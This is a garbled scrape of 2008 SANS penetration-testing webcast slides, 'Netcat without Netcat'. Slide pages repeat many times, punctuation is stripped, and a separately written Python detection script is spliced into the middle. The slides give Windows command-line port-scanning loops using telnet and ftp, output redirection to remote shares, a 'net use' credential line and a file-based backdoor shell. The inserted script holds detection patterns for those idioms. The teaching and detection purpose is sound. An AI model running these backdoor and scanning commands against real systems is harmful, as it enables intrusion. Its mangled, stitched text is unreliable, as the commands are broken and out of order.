
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box

bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves

bull Penetration testers need to be able to make the most

of built-in tools to operate within the rules of engagement for their projects

bull Netcat without Netcat serves these goals

Follo Up

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38

Follow-Upbull SANS Security 560 Network Penetration Testing

and Ethical Hacking

bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20

bull Discount applies to 560 course through August

ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis

ndash July 24-29 Wash DC Skoudis

ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad

ndash Aug 24-29 Va Beach Strand

bull Go to wwwsansorg and look for ldquo560rdquo for details

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39

Outlinebull Why Penetration Testing

bull Windows Command Line Tips for PenTesters

bull Conclusions

bull QampA

ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008

Page 25: Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2539

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 25

Building Blocks

Windows FOR Loopsbull Iteration can be very helpful

ndash Wersquore not expecting you to be programmers ndash But sometimes yoursquoll want to iterate over a given set of

itemsbull Numbers

bull Lines in a file

bull The Windows command line supports several kinds of FOR loopshellip some of the most useful are ndash FOR L Counter

ndash FOR F Iterate over file contents strings or commandoutput

bull See the first webcast in this series for details on how

these workhellip we wonrsquot go through them again here

Windows Port Scanner Using

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2639

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 26

Windows Port Scanner Using

Telnet Clientbull We could systematically telnet to port after portndash Cgt for L i in (111024) do telnet [IPaddr] i

bull Problem When it finds an open port it hangsbull How to address

ndash Watch ithellip When it stops hit CTRL-[ and then type quit to resume

ndash Or kill the telnet client every 5 secondsbull Cgt for L i in (102) do wmic process where

name=telnetexe delete amp ping -n 6 127001

ndash Downside Race condition may kill one that hasnrsquot finished checking

M P bl ith Wi d

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27

More Problems with Windows

Telnet Client as a Port Scannerbull Other problems

ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client

ndash Attempts at redirection either make it hang or not run

bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option

bull So you have to watch it sadly

ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land

bull There must be a better way

Wi d P t S U i

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28

Windows Port Scanner Using

FTP Clientbull Windows FTP client Cgt ftp [IPaddr]

bull Problem Canrsquot specify port to connect to on theinvocation command linehellip only connects to TCP port 21

bull Solution But you can specify dest port in an FTP

command file ndash open [IPaddr] [port]

bull Then the ftp client can read the contents of that file anddo what it says by being invoked withndash Cgt ftp ndashs[filename]

bull Wersquoll write a loop that generates an FTP command fileand invokes FTP to run commands from that file

displaying or storing results at each iteration

Th Wi d C d Li

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29

The Windows Command Line

Port Scanner Using FTP Clientbull Cgt for L i in (111024) do

echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt

bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad

bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly

Making It Store Results

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30

Making It Store Resultsbull Cgt for L i in

(111024) do

echo Checking

Port i gtgt

portstxt amp echoopen [IP_addr] i

gt ftptxt amp echo

quit gtgt ftptxt ampftp -sftptxt

2gtgtportstxt

Windows Command Line File Transfer

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31

Windows Command-Line File Transfer

bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on

the command line redirecting to shares

bull Cgt type [filename] gt[machine][share][filename]

bull Will use current user credentialshellip

bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]

bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands

across the network not just files

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32

File Transfer in Action

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33

Backdoors The File Shellbull Now letrsquos do a backdoor

bull Listening on a port is hardhellipbull But we can look in the file system

bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file

bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34

Using the File Shell

bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt

bull And we can read results by using type to read[IP_addr][share]outputtxt

bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea

ndash Use FTP client to move commands on arbitrary portswriting them into the file system

ndash Or rely on nslookup to pull domain names that includecommands

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35

The File Shell In Action

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36

Outline

bull Building a Penetration TestInfrastructure

bull Netcat without Netcatbull Conclusions

bull QampA

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37

Conclusionsbull Netcat without Netcat shows that with only individual

command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box

bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves

bull Penetration testers need to be able to make the most

of built-in tools to operate within the rules of engagement for their projects

bull Netcat without Netcat serves these goals

Follo Up

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38

Follow-Upbull SANS Security 560 Network Penetration Testing

and Ethical Hacking

bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20

bull Discount applies to 560 course through August

ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis

ndash July 24-29 Wash DC Skoudis

ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad

ndash Aug 24-29 Va Beach Strand

bull Go to wwwsansorg and look for ldquo560rdquo for details

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39

Outlinebull Why Penetration Testing

bull Windows Command Line Tips for PenTesters

bull Conclusions

bull QampA

ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008

Page 26: Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2639

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 26

Windows Port Scanner Using

Telnet Clientbull We could systematically telnet to port after portndash Cgt for L i in (111024) do telnet [IPaddr] i

bull Problem When it finds an open port it hangsbull How to address

ndash Watch ithellip When it stops hit CTRL-[ and then type quit to resume

ndash Or kill the telnet client every 5 secondsbull Cgt for L i in (102) do wmic process where

name=telnetexe delete amp ping -n 6 127001

ndash Downside Race condition may kill one that hasnrsquot finished checking

M P bl ith Wi d

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27

More Problems with Windows

Telnet Client as a Port Scannerbull Other problems

ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client

ndash Attempts at redirection either make it hang or not run

bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option

bull So you have to watch it sadly

ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land

bull There must be a better way

Wi d P t S U i

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28

Windows Port Scanner Using

FTP Clientbull Windows FTP client Cgt ftp [IPaddr]

bull Problem Canrsquot specify port to connect to on theinvocation command linehellip only connects to TCP port 21

bull Solution But you can specify dest port in an FTP

command file ndash open [IPaddr] [port]

bull Then the ftp client can read the contents of that file anddo what it says by being invoked withndash Cgt ftp ndashs[filename]

bull Wersquoll write a loop that generates an FTP command fileand invokes FTP to run commands from that file

displaying or storing results at each iteration

Th Wi d C d Li

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29

The Windows Command Line

Port Scanner Using FTP Clientbull Cgt for L i in (111024) do

echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt

bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad

bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly

Making It Store Results

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30

Making It Store Resultsbull Cgt for L i in

(111024) do

echo Checking

Port i gtgt

portstxt amp echoopen [IP_addr] i

gt ftptxt amp echo

quit gtgt ftptxt ampftp -sftptxt

2gtgtportstxt

Windows Command Line File Transfer

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31

Windows Command-Line File Transfer

bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on

the command line redirecting to shares

bull Cgt type [filename] gt[machine][share][filename]

bull Will use current user credentialshellip

bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]

bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands

across the network not just files

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32

File Transfer in Action

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33

Backdoors The File Shellbull Now letrsquos do a backdoor

bull Listening on a port is hardhellipbull But we can look in the file system

bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file

bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001

Using the File Shell

• Now we can feed it commands by echoing them into \\[IP_addr]\[share]\commands.txt
• And we can read results by using type to read \\[IP_addr]\[share]\output.txt
• The file shell is a building block…
  – Other folks are starting to use it, extending the idea
  – Use FTP client to move commands on arbitrary ports, writing them into the file system
  – Or rely on nslookup to pull domain names that include commands

The File Shell In Action [screenshot]

Outline

• Building a Penetration Test Infrastructure
• Netcat without Netcat
• Conclusions
• Q&A

Conclusions

• Netcat without Netcat shows that, with only individual command execution on a target machine, an attacker can use built-in tools to wield significant control over the target box
• Defenders need to be able to interpret attackers' actions and anticipate their moves
• Penetration testers need to be able to make the most of built-in tools to operate within the rules of engagement for their projects
• Netcat without Netcat serves these goals

Follow-Up

• SANS Security 560: Network Penetration Testing and Ethical Hacking
• 20% discount if you registered for this webcast
  – Use registration discount code of PENTEST20
• Discount applies to 560 course through August:
  – June 4-9, Las Vegas, NV, Skoudis
  – June 12-July 22, Home, On-Line, Skoudis
  – July 24-29, Wash DC, Skoudis
  – Aug 11-16, Boston, Shackleford
  – Aug 18-23, Minneapolis, Conrad
  – Aug 24-29, Va Beach, Strand
• Go to www.sans.org and look for "560" for details

Outline

• Why Penetration Testing?
• Windows Command Line Tips for Pen Testers
• Conclusions
• Q&A
  – REMEMBER: The third webcast in this series of three will be on August 21, 2008

Page 27: Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

More Problems with Windows Telnet Client as a Port Scanner

• Other problems:
  – Results aren't logged
    • You can't do anything with Standard Out of telnet client
      – Attempts at redirection either make it hang or not run
    • And the logging option of the Windows telnet client (-l [filename]) overwrites all earlier logs… No append option
    • So you have to watch it, sadly
  – Most versions of Vista do not include telnet client by default
    • But Netcat without Netcat is about living off the land
• There must be a better way

Windows Port Scanner Using FTP Client

• Windows FTP client: C:\> ftp [IPaddr]
• Problem: Can't specify port to connect to on the invocation command line… only connects to TCP port 21
• Solution: But you can specify dest port in an FTP command file:
  – open [IPaddr] [port]
• Then, the ftp client can read the contents of that file and do what it says by being invoked with:
  – C:\> ftp -s:[filename]
• We'll write a loop that generates an FTP command file and invokes FTP to run commands from that file, displaying or storing results at each iteration

The Windows Command Line Port Scanner Using FTP Client

• C:\> for /L %i in (1,1,1024) do echo open [IPaddr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt
• Problem: It hangs for about 30 seconds on open port, then moves on
  – That's not so bad
• Another Problem: It doesn't store results
  – We can fix that, but it gets a little ugly
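The defender's view of the two techniques above, the ftp -s: port sweep (Windows Port Scanner slides) and the file shell with its ping sleep and share-redirected output (File Shell and Command-Line File Transfer slides), as an added example that is not part of the original slides: rule logic run over constructed process-creation records. The record format, thresholds, host names and sample command lines are assumptions; the fields are the ones Sysmon Event ID 1 or similar telemetry provides. Note that cmd.exe builtins typed at an interactive prompt (the for loop, echo, type) create no process of their own, so the loop is visible only through the children it spawns, which is why the rules key on the parent PID.

```python
"""Added example (not from the original slides): rule-based detection of the
'Netcat without Netcat' command-line idioms over process-creation records.
Record format, thresholds, host names and sample command lines are constructed
assumptions; the fields are the ones Sysmon Event ID 1 or a similar source logs."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW_SECONDS = 60
FTP_SWEEP_THRESHOLD = 20   # ftp -s: launches from one parent inside the window
PING_LOOP_THRESHOLD = 10   # loopback pings from one parent inside the window

# The scanner loop launches ftp.exe once per port, always with -s:<script>.
FTP_SCRIPT_RE = re.compile(r"(^|\\)ftp(\.exe)?\s.*-s:\S+", re.IGNORECASE)
# The file shell sleeps with 'ping -n 2 127.0.0.1' on every pass of its loop.
LOOPBACK_PING_RE = re.compile(
    r"(^|\\)ping(\.exe)?\s+-n\s+\d+\s+(127\.0\.0\.1|::1|localhost)(?!\S)", re.IGNORECASE)
# Standard Out redirected into a UNC share, or credentials mapped with net use.
UNC_REDIRECT_RE = re.compile(r">{1,2}\s*\\\\[^\s\\]+\\\S+")
NET_USE_RE = re.compile(r"(^|\\)net(\.exe)?\s+use\s+\\\\\S+.*\s/u(ser)?:", re.IGNORECASE)


def parse(line):
    """Split a 'timestamp|host|parent_pid|image|command_line' record."""
    ts, host, ppid, image, cmd = line.split("|", 4)
    return {"ts": datetime.fromisoformat(ts), "host": host,
            "ppid": int(ppid), "image": image, "cmd": cmd}


def burst(times, threshold, window):
    """True if some span of `window` seconds holds at least `threshold` events."""
    times = sorted(times)
    left = 0
    for right, t in enumerate(times):
        while (t - times[left]).total_seconds() > window:
            left += 1
        if right - left + 1 >= threshold:
            return True
    return False


def detect(lines):
    """Return one alert dict per rule match: {'host', 'rule', 'detail'}."""
    alerts = []
    ftp_times = defaultdict(list)
    ping_times = defaultdict(list)
    for e in (parse(l) for l in lines if l.strip()):
        # Builtins in the interactive loop spawn no process; group its children
        # (ftp.exe, ping.exe, cmd.exe /c ...) by the parent cmd.exe instead.
        key = (e["host"], e["ppid"])
        if FTP_SCRIPT_RE.search(e["cmd"]):
            ftp_times[key].append(e["ts"])
        if LOOPBACK_PING_RE.search(e["cmd"]):
            ping_times[key].append(e["ts"])
        if UNC_REDIRECT_RE.search(e["cmd"]) or NET_USE_RE.search(e["cmd"]):
            alerts.append({"host": e["host"], "rule": "unc_redirect", "detail": e["cmd"]})
    for (host, ppid), times in ftp_times.items():
        if burst(times, FTP_SWEEP_THRESHOLD, WINDOW_SECONDS):
            alerts.append({"host": host, "rule": "ftp_script_sweep",
                           "detail": f"{len(times)} ftp -s: launches under parent {ppid}"})
    for (host, ppid), times in ping_times.items():
        if burst(times, PING_LOOP_THRESHOLD, WINDOW_SECONDS):
            alerts.append({"host": host, "rule": "ping_sleep_loop",
                           "detail": f"{len(times)} loopback pings under parent {ppid}"})
    return alerts


def sample_log():
    """Constructed records for two hosts; WS01 reproduces the slide idioms."""
    sys32 = "C:\\Windows\\System32\\"
    t0 = datetime(2008, 6, 1, 10, 0, 0)
    lines = []
    # WS01: the ftp -s: sweep, one ftp.exe per port, all children of cmd.exe pid 400
    for i in range(30):
        lines.append(f"{(t0 + timedelta(seconds=i)).isoformat()}|WS01|400|"
                     f"{sys32}ftp.exe|ftp -s:ftp.txt")
    # WS01: the file shell runs a queued command, then loops on ping as a sleep
    t1 = t0 + timedelta(minutes=5)
    lines.append(f"{t1.isoformat()}|WS01|400|{sys32}cmd.exe|cmd.exe /c ipconfig /all")
    for i in range(15):
        lines.append(f"{(t1 + timedelta(seconds=1 + i)).isoformat()}|WS01|400|"
                     f"{sys32}PING.EXE|ping -n 2 127.0.0.1")
    # WS01: results pushed to another machine over file sharing via redirection
    lines.append(f"{(t1 + timedelta(minutes=1)).isoformat()}|WS01|400|{sys32}cmd.exe|"
                 f"cmd.exe /c type output.txt > \\\\10.0.0.5\\share\\output.txt")
    # WS02: one scripted ftp session and an ordinary ping, both benign
    t2 = t0 + timedelta(hours=1)
    lines.append(f"{t2.isoformat()}|WS02|777|{sys32}ftp.exe|ftp -s:deploy.txt")
    lines.append(f"{t2.isoformat()}|WS02|777|{sys32}PING.EXE|ping -n 4 fileserver01")
    return lines


if __name__ == "__main__":
    for a in detect(sample_log()):
        print(a["host"], a["rule"], a["detail"])
```

Thresholds are the tunable part: a single scripted ftp session or an occasional loopback ping is normal on many hosts, so the burst check, not the command line alone, carries the signal.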

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30

Making It Store Resultsbull Cgt for L i in

(111024) do

echo Checking

Port i gtgt

portstxt amp echoopen [IP_addr] i

gt ftptxt amp echo

quit gtgt ftptxt ampftp -sftptxt

2gtgtportstxt

Windows Command Line File Transfer

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31

Windows Command-Line File Transfer

bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on

the command line redirecting to shares

bull Cgt type [filename] gt[machine][share][filename]

bull Will use current user credentialshellip

bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]

bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands

across the network not just files

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32

File Transfer in Action

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33

Backdoors The File Shellbull Now letrsquos do a backdoor

bull Listening on a port is hardhellipbull But we can look in the file system

bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file

bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34

Using the File Shell

bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt

bull And we can read results by using type to read[IP_addr][share]outputtxt

bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea

ndash Use FTP client to move commands on arbitrary portswriting them into the file system

ndash Or rely on nslookup to pull domain names that includecommands

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35

The File Shell In Action

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36

Outline

bull Building a Penetration TestInfrastructure

bull Netcat without Netcatbull Conclusions

bull QampA

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37

Conclusionsbull Netcat without Netcat shows that with only individual

command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box

bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves

bull Penetration testers need to be able to make the most

of built-in tools to operate within the rules of engagement for their projects

bull Netcat without Netcat serves these goals

Follo Up

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38

Follow-Upbull SANS Security 560 Network Penetration Testing

and Ethical Hacking

bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20

bull Discount applies to 560 course through August

ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis

ndash July 24-29 Wash DC Skoudis

ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad

ndash Aug 24-29 Va Beach Strand

bull Go to wwwsansorg and look for ldquo560rdquo for details

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39

Outlinebull Why Penetration Testing

bull Windows Command Line Tips for PenTesters

bull Conclusions

bull QampA

ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008

Page 28: Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28

Windows Port Scanner Using

FTP Clientbull Windows FTP client Cgt ftp [IPaddr]

bull Problem Canrsquot specify port to connect to on theinvocation command linehellip only connects to TCP port 21

bull Solution But you can specify dest port in an FTP

command file ndash open [IPaddr] [port]

bull Then the ftp client can read the contents of that file anddo what it says by being invoked withndash Cgt ftp ndashs[filename]

bull Wersquoll write a loop that generates an FTP command fileand invokes FTP to run commands from that file

displaying or storing results at each iteration

Th Wi d C d Li

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29

The Windows Command Line

Port Scanner Using FTP Clientbull Cgt for L i in (111024) do

echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt

bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad

bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly

Making It Store Results

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30

Making It Store Resultsbull Cgt for L i in

(111024) do

echo Checking

Port i gtgt

portstxt amp echoopen [IP_addr] i

gt ftptxt amp echo

quit gtgt ftptxt ampftp -sftptxt

2gtgtportstxt

Windows Command Line File Transfer

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31

Windows Command-Line File Transfer

bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on

the command line redirecting to shares

bull Cgt type [filename] gt[machine][share][filename]

bull Will use current user credentialshellip

bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]

bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands

across the network not just files

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32

File Transfer in Action

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33

Backdoors The File Shellbull Now letrsquos do a backdoor

bull Listening on a port is hardhellipbull But we can look in the file system

bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file

bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34

Using the File Shell

bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt

bull And we can read results by using type to read[IP_addr][share]outputtxt

bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea

ndash Use FTP client to move commands on arbitrary portswriting them into the file system

